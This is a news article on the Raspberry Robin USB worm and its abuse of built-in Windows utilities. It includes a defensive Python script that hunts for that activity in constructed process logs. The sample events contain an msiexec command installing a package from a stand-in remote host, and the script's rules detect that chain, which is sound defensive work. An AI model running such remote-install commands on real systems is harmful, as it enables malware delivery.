A malware program called “Raspberry Robin” has infected hundreds of Windows networks across multiple sectors, according to a private threat intelligence advisory from Microsoft.
While ransomware attacks often make headlines, the dangers posed by malware can be equally damaging and are another reason to ensure you’re using antivirus software.
The threat group responsible for the malware is currently unknown, as are their motivations and end goal.
Raspberry Robin Worm Infects Networks
Microsoft released a private threat intelligence advisory informing organizations that a worm called Raspberry Robin has infected “hundreds of Windows networks”, reports BleepingComputer.
Raspberry Robin spreads through removable, external USB devices. In other words, in order to infect a device, a user must plug a USB into it and click the malicious file contained within.
A Windows command prompt is exploited, and malicious code is executed on the given device — after which a command and control server is contacted and more malicious files are downloaded.
More legitimate Windows programs — including utilities such as “fodhelper”, “msiexec” and “odbcconf” — are used to execute that code and then the worm will attempt to connect to the Tor network.
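As an added example (not code from Microsoft, Red Canary or Sekoia), a defender could hunt for the utility chain described above in process-creation logs. The event fields, rule names and sample events are constructed, and the parent-process heuristics are assumptions to tune against your own baseline.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /q /i http://nas.example.invalid:8080/pkg"},
    {"host": "ws-01", "parent": "msiexec.exe", "image": "fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"host": "ws-01", "parent": "fodhelper.exe", "image": "odbcconf.exe",
     "cmdline": "odbcconf.exe <arguments omitted>"},
    {"host": "ws-02", "parent": "services.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /V"},
    {"host": "ws-02", "parent": "explorer.exe", "image": "fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"host": "ws-03", "parent": "explorer.exe", "image": "MSIEXEC.EXE",
     "cmdline": "msiexec /i HTTPS://downloads.example.invalid/tool.msi"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
UTILITIES = {"msiexec.exe", "fodhelper.exe", "odbcconf.exe"}
CHAIN_PARENTS = {"cmd.exe"} | UTILITIES  # assumption: parents seen in the described chain

def rules_for(event):
    """Return the names of the heuristics a single event matches."""
    image, parent = event["image"].lower(), event["parent"].lower()
    hits = set()
    if image == "msiexec.exe" and REMOTE_URL.search(event["cmdline"]):
        hits.add("msiexec_remote_package")       # MSI fetched from a remote device
    if image == "fodhelper.exe" and parent != "explorer.exe":
        hits.add("fodhelper_unusual_parent")     # assumption: normally user-launched
    if image == "odbcconf.exe" and parent in CHAIN_PARENTS:
        hits.add("odbcconf_from_utility_chain")
    return hits

def triage(events):
    """Group matched heuristics per host, dropping hosts with no hits."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]] |= rules_for(event)
    return {host: sorted(hits) for host, hits in per_host.items() if hits}

def suspect_hosts(events, min_rules=2):
    """Hosts where several stages of the chain appear together."""
    return sorted(h for h, hits in triage(events).items() if len(hits) >= min_rules)

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS), suspect_hosts(SAMPLE_EVENTS))
```

A single hit such as a remote MSI install on its own can be legitimate software deployment, which is why only hosts matching several rules are escalated.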
Raspberry Robin: A Brief Recent History
The worm dubbed “Raspberry Robin” was first discovered back in September 2021 by intelligence analysts at Red Canary, although most of the activity attributed to the worm has been happening since January 2022. The security researchers observed it mostly in tech and manufacturing networks.
Cybersecurity company Sekoia – which calls it the “QNAP Worm” – was also tracking the worm in November of last year.
Sekoia said the worm was using “compromised QNAP devices as command and control servers” and observed it as active in several French networks. For a piece of malware being investigated by a number of security teams, however, it remains relatively mysterious.
“This worm is using LNK files taking the icons of removable devices to spread (eg. Network shares, USB devices). These LNK files are using well-known techniques in order to download and execute from a compromised device an MSI package containing a malicious library” – Sekoia security team.
As previously mentioned, Microsoft has observed it connecting to addresses on the Tor network, but its operators haven’t actually exploited the access to the networks it has infiltrated, despite the worm flexing its power and showing it can use utilities within the Windows OS.
What’s more, Sekoia noted in their report on the malware that “its main code is quite sophisticated and the infrastructure used is large”, which raises more questions than answers about the nature of the threat itself.
Microsoft, on the other hand, says it found malicious artifacts relating to the worm that were created as far back as 2019.
Protecting Yourself Against Malware
Although threats like these seem powerful, extensive and downright scary, there are a couple of things that businesses and individuals can do to protect themselves and minimize the attack surface of a company or home network.
The first is to keep staff — and yourself, for that matter — in the know about the latest threats and institute compulsory cyber and data security training.
Secondly, install reputable antivirus software on your company network. Antivirus software is designed to detect and remove malware, viruses, and other malicious files from computers and networks. All in all, it’s the best defense against this sort of thing.